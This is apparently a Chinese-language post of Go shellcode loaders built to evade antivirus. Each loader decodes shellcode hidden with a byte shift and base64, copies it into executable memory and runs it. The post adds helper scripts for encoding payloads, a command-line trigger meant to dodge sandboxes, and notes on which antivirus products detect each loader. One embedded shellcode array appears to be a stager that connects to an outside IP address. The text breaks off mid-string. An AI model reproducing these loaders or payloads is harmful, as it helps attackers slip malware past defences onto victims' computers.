免杀加载器代码
加载器代码
package main
import (
"fmt"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。
KEY_1 = 55
KEY_2 = 66
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll") // kernel32.dll它控制着系统的内存管理、数据的输入输出操作和中断处理
ntdll = syscall.MustLoadDLL("ntdll.dll") // ntdll.dll描述了windows本地NTAPI的接口
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") // VirtualAlloc申请内存空间
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") // RtlCopyMemory非重叠内存区域的复制
)
func main() { // 生成的shellcode值+1
xor_shellcode := []byte{ "shellcode+1" }
var shellcode []byte
for i := 0; i < len(xor_shellcode); i++ {
if xor_shellcode[i] == 255 {
shellcode = append(shellcode, xor_shellcode[i])
} else {
shellcode = append(shellcode, xor_shellcode[i]-1) //^KEY_1^KEY_2) 递归shellcode-1还原
}
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) // 为shellcode申请内存空间
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println("error------------------------------")
fmt.Println(err.Error())
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) // 将shellcode内存复制到申请出来的内存空间中
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println(err.Error())
}
syscall.Syscall(addr, 0, 0, 0, 0)
}
// uintptr一个足够大的无符号整型, 用来表示任意地址。
// MEM_COMMIT标志将在页面大小边界上提交页面,而使用MEM_RESERVE或MEM_RESERVE | MEM_COMMIT将在大于页面大小的边界上保留或保留提交页面。
辅助代码(特定格式shellcode生成)
Shellcode+1并输出
package main
import (
"encoding/hex"
"fmt"
)
func main() {
xor_shellcode := []byte{ "原始shellcode" }
var js int = 0
var tmp string
var shellcode []byte
for i := 0; i < len(xor_shellcode); i++ {
if xor_shellcode[i] == 255 {
shellcode = append(shellcode, xor_shellcode[i])
} else {
shellcode = append(shellcode, xor_shellcode[i]+1) //^KEY_1^KEY_2) 递归shellcode+1
}
}
str := hex.EncodeToString(shellcode)
for j := 0; j < len(str)/2; j = j + 1 {
tmp = tmp + ",0x" + str[js:js+2]
js = js + 2
}
fmt.Println(tmp)
}
免杀效果
火绒免杀
360免杀
Defender静态被杀
注意:需要生成64位shellcode,32位会报错。
免杀加载器代码
package main
import (
"fmt"
"os"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。
KEY_1 = 55
KEY_2 = 66
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll") // kernel32.dll它控制着系统的内存管理、数据的输入输出操作和中断处理
ntdll = syscall.MustLoadDLL("ntdll.dll") // ntdll.dll描述了windows本地NTAPI的接口
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") // VirtualAlloc申请内存空间
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") // RtlCopyMemory非重叠内存区域的复制
)
func condition() {
var a string
for i := 1; i < len(os.Args); i++ {
a += os.Args[i]
}
b := "qaxnb"
if a == b {
build()
}
}
func build() { // 生成的shellcode值+1
xor_shellcode := []byte{0xfd, 0x49, 0x84, 0xe5, 0xf1, 0xe9, 0xc9, 0x01, 0x01, 0x01, 0x42, 0x52, 0x42, 0x51, 0x53, 0x52, 0x57, 0x49, 0x32, 0xd3, 0x66, 0x49, 0x8c, 0x53, 0x61, 0x49, 0x8c, 0x53, 0x19, 0x49, 0x8c, 0x53, 0x21, 0x49, 0x8c, 0x73, 0x51, 0x49, 0x10, 0xb8, 0x4b, 0x4b, 0x4e, 0x32, 0xca, 0x49, 0x32, 0xc1, 0xad, 0x3d, 0x62, 0x7d, 0x03, 0x2d, 0x21, 0x42, 0xc2, 0xca, 0x0e, 0x42, 0x02, 0xc2, 0xe3, 0xee, 0x53, 0x42, 0x52, 0x49, 0x8c, 0x53, 0x21, 0x8c, 0x43, 0x3d, 0x49, 0x02, 0xd1, 0x67, 0x82, 0x79, 0x19, 0x0c, 0x03, 0x76, 0x73, 0x8c, 0x81, 0x89, 0x01, 0x01, 0x01, 0x49, 0x86, 0xc1, 0x75, 0x68, 0x49, 0x02, 0xd1, 0x51, 0x8c, 0x49, 0x19, 0x45, 0x8c, 0x41, 0x21, 0x4a, 0x02, 0xd1, 0xe4, 0x57, 0x49, 0xff, 0xca, 0x42, 0x8c, 0x35, 0x89, 0x49, 0x02, 0xd7, 0x4e, 0x32, 0xca, 0x49, 0x32, 0xc1, 0xad, 0x42, 0xc2, 0xca, 0x0e, 0x42, 0x02, 0xc2, 0x39, 0xe1, 0x76, 0xf2, 0x4d, 0x04, 0x4d, 0x25, 0x09, 0x46, 0x3a, 0xd2, 0x76, 0xd9, 0x59, 0x45, 0x8c, 0x41, 0x25, 0x4a, 0x02, 0xd1, 0x67, 0x42, 0x8c, 0x0d, 0x49, 0x45, 0x8c, 0x41, 0x1d, 0x4a, 0x02, 0xd1, 0x42, 0x8c, 0x05, 0x89, 0x49, 0x02, 0xd1, 0x42, 0x59, 0x42, 0x59, 0x5f, 0x5a, 0x5b, 0x42, 0x59, 0x42, 0x5a, 0x42, 0x5b, 0x49, 0x84, 0xed, 0x21, 0x42, 0x53, 0xff, 0xe1, 0x59, 0x42, 0x5a, 0x5b, 0x49, 0x8c, 0x13, 0xea, 0x50, 0xff, 0xff, 0xff, 0x5e, 0x6b, 0x01, 0x4a, 0xbf, 0x78, 0x6a, 0x6f, 0x6a, 0x6f, 0x66, 0x75, 0x01, 0x42, 0x57, 0x4a, 0x8a, 0xe7, 0x4d, 0x8a, 0xf2, 0x42, 0xbb, 0x4d, 0x78, 0x27, 0x08, 0xff, 0xd6, 0x49, 0x32, 0xca, 0x49, 0x32, 0xd3, 0x4e, 0x32, 0xc1, 0x4e, 0x32, 0xca, 0x42, 0x51, 0x42, 0x51, 0x42, 0xbb, 0x3b, 0x57, 0x7a, 0xa8, 0xff, 0xd6, 0xec, 0x74, 0x5b, 0x49, 0x8a, 0xc2, 0x42, 0xb9, 0xa4, 0x20, 0x01, 0x01, 0x4e, 0x32, 0xca, 0x42, 0x52, 0x42, 0x52, 0x6b, 0x04, 0x42, 0x52, 0x42, 0xbb, 0x58, 0x8a, 0xa0, 0xc7, 0xff, 0xd6, 0xec, 0x5a, 0x5c, 0x49, 0x8a, 0xc2, 0x49, 0x32, 0xd3, 0x4a, 0x8a, 0xd9, 0x4e, 0x32, 0xca, 0x53, 0x69, 0x01, 0x03, 0x41, 0x85, 0x53, 0x53, 0x42, 0xbb, 0xec, 0x56, 0x2f, 0x3c, 0xff, 0xd6, 0x49, 0x8a, 0xc7, 0x49, 0x84, 0xc4, 0x51, 0x6b, 0x0b, 0x60, 0x49, 0x8a, 0xf2, 0x49, 0x8a, 0xdb, 0x4a, 0xc8, 0xc1, 0xff, 0xff, 0xff, 0xff, 0x4e, 0x32, 0xca, 0x53, 0x53, 0x42, 0xbb, 0x2e, 0x07, 0x19, 0x7c, 0xff, 0xd6, 0x86, 0xc1, 0x10, 0x86, 0x9e, 0x02, 0x01, 0x01, 0x49, 0xff, 0xd0, 0x10, 0x85, 0x8d, 0x02, 0x01, 0x01, 0xec, 0xd4, 0xea, 0xe5, 0x02, 0x01, 0x01, 0xe9, 0xa3, 0xff, 0xff, 0xff, 0x30, 0x72, 0x44, 0x54, 0x57, 0x01, 0x36, 0x50, 0x22, 0x51, 0x26, 0x41, 0x42, 0x51, 0x5c, 0x35, 0x5d, 0x51, 0x5b, 0x59, 0x36, 0x35, 0x29, 0x51, 0x5f, 0x2a, 0x38, 0x44, 0x44, 0x2a, 0x38, 0x7e, 0x25, 0x46, 0x4a, 0x44, 0x42, 0x53, 0x2e, 0x54, 0x55, 0x42, 0x4f, 0x45, 0x42, 0x53, 0x45, 0x2e, 0x42, 0x4f, 0x55, 0x4a, 0x57, 0x4a, 0x53, 0x56, 0x54, 0x2e, 0x55, 0x46, 0x54, 0x55, 0x2e, 0x47, 0x4a, 0x4d, 0x46, 0x22, 0x25, 0x49, 0x2c, 0x49, 0x2b, 0x01, 0x36, 0x50, 0x22, 0x51, 0x26, 0x01, 0x56, 0x74, 0x66, 0x73, 0x2e, 0x42, 0x68, 0x66, 0x6f, 0x75, 0x3b, 0x21, 0x4e, 0x70, 0x7b, 0x6a, 0x6d, 0x6d, 0x62, 0x30, 0x35, 0x2f, 0x31, 0x21, 0x29, 0x64, 0x70, 0x6e, 0x71, 0x62, 0x75, 0x6a, 0x63, 0x6d, 0x66, 0x3c, 0x21, 0x4e, 0x54, 0x4a, 0x46, 0x21, 0x38, 0x2f, 0x31, 0x3c, 0x21, 0x58, 0x6a, 0x6f, 0x65, 0x70, 0x78, 0x74, 0x21, 0x4f, 0x55, 0x21, 0x36, 0x2f, 0x32, 0x2a, 0x0e, 0x0b, 0x01, 0x36, 0x50, 0x22, 0x51, 0x26, 0x41, 0x42, 0x51, 0x5c, 0x35, 0x5d, 0x51, 0x5b, 0x59, 0x36, 0x35, 0x29, 0x51, 0x5f, 0x2a, 0x38, 0x44, 0x44, 0x2a, 0x38, 0x7e, 0x25, 0x46, 0x4a, 0x44, 0x42, 0x53, 0x2e, 0x54, 0x55, 0x42, 0x4f, 0x45, 0x42, 0x53, 0x45, 0x2e, 0x42, 0x4f, 0x55, 0x4a, 0x57, 0x4a, 0x53, 0x56, 0x54, 0x2e, 0x55, 0x46, 0x54, 0x55, 0x2e, 0x47, 0x4a, 0x4d, 0x46, 0x22, 0x25, 0x49, 0x2c, 0x49, 0x2b, 0x01, 0x36, 0x50, 0x22, 0x51, 0x26, 0x41, 0x42, 0x51, 0x5c, 0x35, 0x5d, 0x51, 0x5b, 0x59, 0x36, 0x35, 0x29, 0x51, 0x5f, 0x2a, 0x38, 0x44, 0x44, 0x2a, 0x38, 0x7e, 0x25, 0x46, 0x4a, 0x44, 0x42, 0x53, 0x2e, 0x54, 0x55, 0x42, 0x4f, 0x45, 0x42, 0x53, 0x45, 0x2e, 0x42, 0x4f, 0x55, 0x4a, 0x57, 0x4a, 0x53, 0x56, 0x54, 0x2e, 0x55, 0x46, 0x54, 0x55, 0x2e, 0x47, 0x4a, 0x4d, 0x46, 0x22, 0x25, 0x49, 0x2c, 0x49, 0x2b, 0x01, 0x36, 0x50, 0x22, 0x51, 0x26, 0x41, 0x42, 0x51, 0x5c, 0x35, 0x5d, 0x51, 0x5b, 0x59, 0x36, 0x35, 0x29, 0x51, 0x5f, 0x2a, 0x38, 0x44, 0x44, 0x2a, 0x38, 0x7e, 0x25, 0x46, 0x4a, 0x44, 0x42, 0x53, 0x2e, 0x54, 0x55, 0x42, 0x4f, 0x45, 0x42, 0x53, 0x45, 0x2e, 0x42, 0x4f, 0x55, 0x4a, 0x57, 0x4a, 0x53, 0x56, 0x54, 0x2e, 0x55, 0x46, 0x54, 0x55, 0x2e, 0x47, 0x4a, 0x4d, 0x46, 0x22, 0x25, 0x49, 0x2c, 0x49, 0x2b, 0x01, 0x36, 0x50, 0x22, 0x51, 0x26, 0x41, 0x42, 0x51, 0x5c, 0x35, 0x5d, 0x51, 0x5b, 0x59, 0x36, 0x35, 0x29, 0x51, 0x5f, 0x2a, 0x38, 0x44, 0x44, 0x2a, 0x38, 0x7e, 0x25, 0x46, 0x4a, 0x44, 0x42, 0x53, 0x2e, 0x54, 0x01, 0x42, 0xbf, 0xf1, 0xb6, 0xa3, 0x57, 0xff, 0xd6, 0x49, 0x32, 0xca, 0xbb, 0x01, 0x01, 0x41, 0x01, 0x42, 0xb9, 0x01, 0x11, 0x01, 0x01, 0x42, 0xba, 0x41, 0x01, 0x01, 0x01, 0x42, 0xbb, 0x59, 0xa5, 0x54, 0xe6, 0xff, 0xd6, 0x49, 0x94, 0x54, 0x54, 0x49, 0x8a, 0xe8, 0x49, 0x8a, 0xf2, 0x49, 0x8a, 0xdb, 0x42, 0xb9, 0x01, 0x21, 0x01, 0x01, 0x4a, 0x8a, 0xfa, 0x42, 0xbb, 0x13, 0x97, 0x8a, 0xe3, 0xff, 0xd6, 0x49, 0x84, 0xc5, 0x21, 0x86, 0xc1, 0x75, 0xb7, 0x67, 0x8c, 0x08, 0x49, 0x02, 0xc4, 0x86, 0xc1, 0x76, 0xd8, 0x59, 0x59, 0x59, 0x49, 0x06, 0x01, 0x01, 0x01, 0x01, 0x51, 0xc4, 0xe9, 0xa0, 0xfe, 0xff, 0xff, 0x32, 0x3a, 0x33, 0x2f, 0x32, 0x37, 0x39, 0x2f, 0x37, 0x31, 0x2f, 0x32, 0x34, 0x37, 0x01, 0x01, 0x01, 0x01, 0x01}
var shellcode []byte
for i := 0; i < len(xor_shellcode); i++ {
if xor_shellcode[i] == 255 {
shellcode = append(shellcode, xor_shellcode[i])
} else {
shellcode = append(shellcode, xor_shellcode[i]-1) //^KEY_1^KEY_2) 递归shellcode-1还原
}
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) // 为shellcode申请内存空间
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println("error------------------------------")
fmt.Println(err.Error())
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) // 将shellcode内存复制到申请出来的内存空间中
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println(err.Error())
}
syscall.Syscall(addr, 0, 0, 0, 0)
}
func main() {
condition()
}
// uintptr一个足够大的无符号整型, 用来表示任意地址。
// MEM_COMMIT标志将在页面大小边界上提交页面,而使用MEM_RESERVE或MEM_RESERVE | MEM_COMMIT将在大于页面大小的边界上保留或保留提交页面。
免杀效果
火绒免杀
360免杀
Defender静态免杀动态被杀
免杀加载器代码
加载器代码
package main
import (
"encoding/base64"
"fmt"
"strconv"
"strings"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。
KEY_1 = 55
KEY_2 = 66
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll") // kernel32.dll它控制着系统的内存管理、数据的输入输出操作和中断处理
ntdll = syscall.MustLoadDLL("ntdll.dll") // ntdll.dll描述了windows本地NTAPI的接口
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") // VirtualAlloc申请内存空间
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") // RtlCopyMemory非重叠内存区域的复制
)
func main() { // 生成的shellcode值+1并base64编码再在前面加2位混淆字符
xor_shellcode := "0lXHhmZFx4NDlceDg0XHhlNVx4ZjFceGU5XHhjOVx4MVx4MVx4MVx4NDJceDUyXHg0Mlx4NTFceDUzXHg1Mlx4NTdceDQ5XHgzMlx4ZDNceDY2XHg0OVx4OGNceDUzXHg2MVx4NDlceDhjXHg1M1x4MTlceDQ5XHg4Y1x4NTNceDIxXHg0OVx4OGNceDczXHg1MVx4NDlceDEwXHhiOFx4NGJceDRiXHg0ZVx4MzJceGNhXHg0OVx4MzJceGMxXHhhZFx4M2RceDYyXHg3ZFx4M1x4MmRceDIxXHg0Mlx4YzJceGNhXHhlXHg0Mlx4Mlx4YzJceGUzXHhlZVx4NTNceDQyXHg1Mlx4NDlceDhjXHg1M1x4MjFceDhjXHg0M1x4M2RceDQ5XHgyXHhkMVx4NjdceDgyXHg3OVx4MTlceGNceDNceDc2XHg3M1x4OGNceDgxXHg4OVx4MVx4MVx4MVx4NDlceDg2XHhjMVx4NzVceDY4XHg0OVx4Mlx4ZDFceDUxXHg4Y1x4NDlceDE5XHg0NVx4OGNceDQxXHgyMVx4NGFceDJceGQxXHhlNFx4NTdceDQ5XHgxMDBceGNhXHg0Mlx4OGNceDM1XHg4OVx4NDlceDJceGQ3XHg0ZVx4MzJceGNhXHg0OVx4MzJceGMxXHhhZFx4NDJceGMyXHhjYVx4ZVx4NDJceDJceGMyXHgzOVx4ZTFceDc2XHhmMlx4NGRceDRceDRkXHgyNVx4OVx4NDZceDNhXHhkMlx4NzZceGQ5XHg1OVx4NDVceDhjXHg0MVx4MjVceDRhXHgyXHhkMVx4NjdceDQyXHg4Y1x4ZFx4NDlceDQ1XHg4Y1x4NDFceDFkXHg0YVx4Mlx4ZDFceDQyXHg4Y1x4NVx4ODlceDQ5XHgyXHhkMVx4NDJceDU5XHg0Mlx4NTlceDVmXHg1YVx4NWJceDQyXHg1OVx4NDJceDVhXHg0Mlx4NWJceDQ5XHg4NFx4ZWRceDIxXHg0Mlx4NTNceDEwMFx4ZTFceDU5XHg0Mlx4NWFceDViXHg0OVx4OGNceDEzXHhlYVx4NTBceDEwMFx4MTAwXHgxMDBceDVlXHg2Ylx4MVx4NGFceGJmXHg3OFx4NmFceDZmXHg2YVx4NmZceDY2XHg3NVx4MVx4NDJceDU3XHg0YVx4OGFceGU3XHg0ZFx4OGFceGYyXHg0Mlx4YmJceDRkXHg3OFx4MjdceDhceDEwMFx4ZDZceDQ5XHgzMlx4Y2FceDQ5XHgzMlx4ZDNceDRlXHgzMlx4YzFceDRlXHgzMlx4Y2FceDQyXHg1MVx4NDJceDUxXHg0Mlx4YmJceDNiXHg1N1x4N2FceGE4XHgxMDBceGQ2XHhlY1x4NzRceDViXHg0OVx4OGFceGMyXHg0Mlx4YjlceGE0XHgyMFx4MVx4MVx4NGVceDMyXHhjYVx4NDJceDUyXHg0Mlx4NTJceDZiXHg0XHg0Mlx4NTJceDQyXHhiYlx4NThceDhhXHhhMFx4YzdceDEwMFx4ZDZceGVjXHg1YVx4NWNceDQ5XHg4YVx4YzJceDQ5XHgzMlx4ZDNceDRhXHg4YVx4ZDlceDRlXHgzMlx4Y2FceDUzXHg2OVx4MVx4M1x4NDFceDg1XHg1M1x4NTNceDQyXHhiYlx4ZWNceDU2XHgyZlx4M2NceDEwMFx4ZDZceDQ5XHg4YVx4YzdceDQ5XHg4NFx4YzRceDUxXHg2Ylx4Ylx4NjBceDQ5XHg4YVx4ZjJceDQ5XHg4YVx4ZGJceDRhXHhjOFx4YzFceDEwMFx4MTAwXHgxMDBceDEwMFx4NGVceDMyXHhjYVx4NTNceDUzXHg0Mlx4YmJceDJlXHg3XHgxOVx4N2NceDEwMFx4ZDZceDg2XHhjMVx4MTBceDg2XHg5ZVx4Mlx4MVx4MVx4NDlceDEwMFx4ZDBceDEwXHg4NVx4OGRceDJceDFceDFceGVjXHhkNFx4ZWFceGU1XHgyXHgxXHgxXHhlOVx4YTNceDEwMFx4MTAwXHgxMDBceDMwXHg1Ylx4NmVceDRhXHg0ZVx4MVx4MzZceDUwXHgyMlx4NTFceDI2XHg0MVx4NDJceDUxXHg1Y1x4MzVceDVkXHg1MVx4NWJceDU5XHgzNlx4MzVceDI5XHg1MVx4NWZceDJhXHgzOFx4NDRceDQ0XHgyYVx4MzhceDdlXHgyNVx4NDZceDRhXHg0NFx4NDJceDUzXHgyZVx4NTRceDU1XHg0Mlx4NGZceDQ1XHg0Mlx4NTNceDQ1XHgyZVx4NDJceDRmXHg1NVx4NGFceDU3XHg0YVx4NTNceDU2XHg1NFx4MmVceDU1XHg0Nlx4NTRceDU1XHgyZVx4NDdceDRhXHg0ZFx4NDZceDIyXHgyNVx4NDlceDJjXHg0OVx4MmJceDFceDM2XHg1MFx4MjJceDUxXHgyNlx4MVx4NTZceDc0XHg2Nlx4NzNceDJlXHg0Mlx4NjhceDY2XHg2Zlx4NzVceDNiXHgyMVx4NGVceDcwXHg3Ylx4NmFceDZkXHg2ZFx4NjJceDMwXHgzNVx4MmZceDMxXHgyMVx4MjlceDY0XHg3MFx4NmVceDcxXHg2Mlx4NzVceDZhXHg2M1x4NmRceDY2XHgzY1x4MjFceDRlXHg1NFx4NGFceDQ2XHgyMVx4MzlceDJmXHgzMVx4M2NceDIxXHg1OFx4NmFceDZmXHg2NVx4NzBceDc4XHg3NFx4MjFceDRmXHg1NVx4MjFceDM2XHgyZlx4MzJceDNjXHgyMVx4NTVceDczXHg2YVx4NjVceDY2XHg2Zlx4NzVceDMwXHgzNVx4MmZceDMxXHgzY1x4MjFceDQzXHg1NVx4NTNceDU0XHgzMlx4MzNceDM2XHgzNlx4MzNceDM3XHgyYVx4ZVx4Ylx4MVx4MzZceDUwXHgyMlx4NTFceDI2XHg0MVx4NDJceDUxXHg1Y1x4MzVceDVkXHg1MVx4NWJceDU5XHgzNlx4MzVceDI5XHg1MVx4NWZceDJhXHgzOFx4NDRceDQ0XHgyYVx4MzhceDdlXHgyNVx4NDZceDRhXHg0NFx4NDJceDUzXHgyZVx4NTRceDU1XHg0Mlx4NGZceDQ1XHg0Mlx4NTNceDQ1XHgyZVx4NDJceDRmXHg1NVx4NGFceDU3XHg0YVx4NTNceDU2XHg1NFx4MmVceDU1XHg0Nlx4NTRceDU1XHgyZVx4NDdceDRhXHg0ZFx4NDZceDIyXHgyNVx4NDlceDJjXHg0OVx4MmJceDFceDM2XHg1MFx4MjJceDUxXHgyNlx4NDFceDQyXHg1MVx4NWNceDM1XHg1ZFx4NTFceDViXHg1OVx4MzZceDM1XHgyOVx4NTFceDVmXHgyYVx4MzhceDQ0XHg0NFx4MmFceDM4XHg3ZVx4MjVceDQ2XHg0YVx4NDRceDQyXHg1M1x4MmVceDU0XHg1NVx4NDJceDRmXHg0NVx4NDJceDUzXHg0NVx4MmVceDQyXHg0Zlx4NTVceDRhXHg1N1x4NGFceDUzXHg1Nlx4NTRceDJlXHg1NVx4NDZceDU0XHg1NVx4MmVceDQ3XHg0YVx4NGRceDQ2XHgyMlx4MjVceDQ5XHgyY1x4NDlceDJiXHgxXHgzNlx4NTBceDIyXHg1MVx4MjZceDQxXHg0Mlx4NTFceDVjXHgzNVx4NWRceDUxXHg1Ylx4NTlceDM2XHgzNVx4MjlceDUxXHg1Zlx4MmFceDM4XHg0NFx4NDRceDJhXHgzOFx4N2VceDI1XHg0Nlx4NGFceDQ0XHg0Mlx4NTNceDJlXHg1NFx4NTVceDQyXHg0Zlx4NDVceDQyXHg1M1x4NDVceDJlXHg0Mlx4NGZceDU1XHg0YVx4NTdceDRhXHg1M1x4NTZceDU0XHgyZVx4NTVceDQ2XHg1NFx4NTVceDJlXHg0N1x4NGFceDRkXHg0Nlx4MjJceDI1XHg0OVx4MmNceDQ5XHgyYlx4MVx4MzZceDUwXHgyMlx4NTFceDI2XHg0MVx4NDJceDUxXHg1Y1x4MVx4NDJceGJmXHhmMVx4YjZceGEzXHg1N1x4MTAwXHhkNlx4NDlceDMyXHhjYVx4YmJceDFceDFceDQxXHgxXHg0Mlx4YjlceDFceDExXHgxXHgxXHg0Mlx4YmFceDQxXHgxXHgxXHgxXHg0Mlx4YmJceDU5XHhhNVx4NTRceGU2XHgxMDBceGQ2XHg0OVx4OTRceDU0XHg1NFx4NDlceDhhXHhlOFx4NDlceDhhXHhmMlx4NDlceDhhXHhkYlx4NDJceGI5XHgxXHgyMVx4MVx4MVx4NGFceDhhXHhmYVx4NDJceGJiXHgxM1x4OTdceDhhXHhlM1x4MTAwXHhkNlx4NDlceDg0XHhjNVx4MjFceDg2XHhjMVx4NzVceGI3XHg2N1x4OGNceDhceDQ5XHgyXHhjNFx4ODZceGMxXHg3Nlx4ZDhceDU5XHg1OVx4NTlceDQ5XHg2XHgxXHgxXHgxXHgxXHg1MVx4YzRceGU5XHhhMFx4ZmVceDEwMFx4MTAwXHgzMlx4M2FceDMzXHgyZlx4MzJceDM3XHgzOVx4MmZceDM3XHgzMVx4MmZceDMyXHgzNFx4MzdceDFceDFceDFceDFceDE="
var payload_byte []byte
shellcode_byte, _ := base64.StdEncoding.DecodeString(xor_shellcode[2:]) // 除混淆字符外base64解码
payload := string(shellcode_byte) // []byte切片转string
payloadb := strings.Split(payload, "\\x")[1:] // 以\x将字符串分割成切片
for i := 0; i < len(payloadb); i++ { // 遍历转16进制
tmp_byte, err1 := strconv.ParseInt(payloadb[i], 16, 32) // 取切片中的字符转16进制
if err1 != nil {
fmt.Println(err1.Error())
}
payload_byte = append(payload_byte, uint8(tmp_byte)) // 加到payload_byte切片中
}
var shellcode []byte
for i := 0; i < len(payload_byte); i++ {
if payload_byte[i] == 255 {
shellcode = append(shellcode, payload_byte[i])
} else {
shellcode = append(shellcode, payload_byte[i]-1) // 递归shellcode-1还原
}
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) // 为shellcode申请内存空间
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println("error------------------------------")
fmt.Println(err.Error())
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) // 将shellcode内存复制到申请出来的内存空间中
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println(err.Error())
}
syscall.Syscall(addr, 0, 0, 0, 0)
}
// uintptr一个足够大的无符号整型, 用来表示任意地址。
// MEM_COMMIT标志将在页面大小边界上提交页面,而使用MEM_RESERVE或MEM_RESERVE | MEM_COMMIT将在大于页面大小的边界上保留或保留提交页面。
辅助代码(特定格式shellcode生成)
shellcode+1后base64编码前面再加两个混淆字符
import base64,random
a = b" 原shellcode内容 "
payload = []
rd = ''
for i in range(len(a)) :
payload.append(hex(int(a[i])+1))
shellcode = ''.join(payload).replace('0x','\\x')
shellcode64 = base64.b64encode(shellcode.encode()).decode()
for i in range(2):
rd = rd + (random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'))
print(rd + shellcode64)
免杀效果
火绒免杀
360免杀
Defender静态免杀动态被杀
免杀加载器代码
package main
import (
"encoding/base64"
"fmt"
"os"
"strconv"
"strings"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。
KEY_1 = 55
KEY_2 = 66
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll") // kernel32.dll它控制着系统的内存管理、数据的输入输出操作和中断处理
ntdll = syscall.MustLoadDLL("ntdll.dll") // ntdll.dll描述了windows本地NTAPI的接口
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") // VirtualAlloc申请内存空间
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") // RtlCopyMemory非重叠内存区域的复制
)
func condition() {
var a string
for i := 1; i < len(os.Args); i++ {
a += os.Args[i]
}
b := "qaxnb"
if a == b {
build()
}
}
func build() {
xor_shellcode := "0lXHhmZFx4NDlceDg0XHhlNVx4ZjFceGU5XHhjOVx4MVx4MVx4MVx4NDJceDUyXHg0Mlx4NTFceDUzXHg1Mlx4NTdceDQ5XHgzMlx4ZDNceDY2XHg0OVx4OGNceDUzXHg2MVx4NDlceDhjXHg1M1x4MTlceDQ5XHg4Y1x4NTNceDIxXHg0OVx4OGNceDczXHg1MVx4NDlceDEwXHhiOFx4NGJceDRiXHg0ZVx4MzJceGNhXHg0OVx4MzJceGMxXHhhZFx4M2RceDYyXHg3ZFx4M1x4MmRceDIxXHg0Mlx4YzJceGNhXHhlXHg0Mlx4Mlx4YzJceGUzXHhlZVx4NTNceDQyXHg1Mlx4NDlceDhjXHg1M1x4MjFceDhjXHg0M1x4M2RceDQ5XHgyXHhkMVx4NjdceDgyXHg3OVx4MTlceGNceDNceDc2XHg3M1x4OGNceDgxXHg4OVx4MVx4MVx4MVx4NDlceDg2XHhjMVx4NzVceDY4XHg0OVx4Mlx4ZDFceDUxXHg4Y1x4NDlceDE5XHg0NVx4OGNceDQxXHgyMVx4NGFceDJceGQxXHhlNFx4NTdceDQ5XHgxMDBceGNhXHg0Mlx4OGNceDM1XHg4OVx4NDlceDJceGQ3XHg0ZVx4MzJceGNhXHg0OVx4MzJceGMxXHhhZFx4NDJceGMyXHhjYVx4ZVx4NDJceDJceGMyXHgzOVx4ZTFceDc2XHhmMlx4NGRceDRceDRkXHgyNVx4OVx4NDZceDNhXHhkMlx4NzZceGQ5XHg1OVx4NDVceDhjXHg0MVx4MjVceDRhXHgyXHhkMVx4NjdceDQyXHg4Y1x4ZFx4NDlceDQ1XHg4Y1x4NDFceDFkXHg0YVx4Mlx4ZDFceDQyXHg4Y1x4NVx4ODlceDQ5XHgyXHhkMVx4NDJceDU5XHg0Mlx4NTlceDVmXHg1YVx4NWJceDQyXHg1OVx4NDJceDVhXHg0Mlx4NWJceDQ5XHg4NFx4ZWRceDIxXHg0Mlx4NTNceDEwMFx4ZTFceDU5XHg0Mlx4NWFceDViXHg0OVx4OGNceDEzXHhlYVx4NTBceDEwMFx4MTAwXHgxMDBceDVlXHg2Ylx4MVx4NGFceGJmXHg3OFx4NmFceDZmXHg2YVx4NmZceDY2XHg3NVx4MVx4NDJceDU3XHg0YVx4OGFceGU3XHg0ZFx4OGFceGYyXHg0Mlx4YmJceDRkXHg3OFx4MjdceDhceDEwMFx4ZDZceDQ5XHgzMlx4Y2FceDQ5XHgzMlx4ZDNceDRlXHgzMlx4YzFceDRlXHgzMlx4Y2FceDQyXHg1MVx4NDJceDUxXHg0Mlx4YmJceDNiXHg1N1x4N2FceGE4XHgxMDBceGQ2XHhlY1x4NzRceDViXHg0OVx4OGFceGMyXHg0Mlx4YjlceGE0XHgyMFx4MVx4MVx4NGVceDMyXHhjYVx4NDJceDUyXHg0Mlx4NTJceDZiXHg0XHg0Mlx4NTJceDQyX